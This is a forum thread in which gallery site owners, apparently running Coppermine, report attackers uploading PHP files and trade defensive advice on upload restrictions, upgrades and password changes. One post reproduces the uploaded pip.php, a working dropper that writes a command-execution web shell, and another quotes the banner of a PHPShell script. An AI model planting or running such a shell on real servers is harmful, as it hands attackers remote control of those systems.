Site hacked..

[togi]

My site was hacked once.. upgraded it to a newer version and it seems like I am getting stange visitors..
I have limited uploads to images and txt/pdf and movies..

How do i stop these hacker from coming back?

here is one of the files uploaded.. title is pip.php

<?php
     $suntzu=fopen("shell.php","w");
     fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
     fclose($suntzu);
     chmod("shell.php",777);
?>


there was another guy today.. but deleted it without saving..
he uploaded a imagename.php.jpg ... i found it fishy so i deleted it..

would like to hear meaasures others have taken to make the site free from
hackers.. thank you very much!

[kegobeer]

Here are some ideas:

Don't allow visitors to upload files.  Verify all of your members prior to allowing them to upload files.  Only allow jpeg files.

[togi]

Thanks for the tip.. i set the movie, audio and document type to "none" is that ok?  i set images to jpg/gif/tif

[Abbas Ali]

Upgrade to 1.4.4 asap. The above file "pip.php" which was uploaded to your site is because of recent vulnaribility found in cpg. The hacker must have extracted your database password and other details. Please change them asap.

[Fudgemaster]

I got a new user also, uploaded 2 files.
123.php.php.rar and 123.php.php7.rar

Both are php files..

Code Select Expand


*****************************************************************************************
*                           PHPSHELL.PHP  BY MACKER     30 March 2003                   *
*****************************************************************************************
*                                                                                       * 
*   Welcome to Macker's PHPShell script...                                              *
*   This script will allow you to browse webservers etc...                              *
*   Just copy the file to your directory and open it in your Internet Browser.          *
*                                                                                       *
*   The webserver should support PHP...                                                 *
*                                                                                       *
*   You can modify the script if you want, but please send me a copy to:                * 
*                               DRAZZ01@HOTMAIL.COM                                     *
*****************************************************************************************

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !!
!!                Sites or even the server... You are responsible for your own deeds.  !!
!!                The admin of your webserver should always know you are using this    !!
!!                script.                                                              !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/

Damnit. and all because of me. I upgraded to 1.4.3 and didn't realize the upload permissions get reseted in upgrade =(
The remotethingamajigger update is applied now and passwords are renewed.

Gotta go thru every dir etc. for crap  :'(

[Stramm]

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

[Fudgemaster]

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Oh thank You. that was a relief to hear.
I almost soiled myself at work today when I noticed that extra crap on my
site because I've never allowed anyone else than myself to upload anything.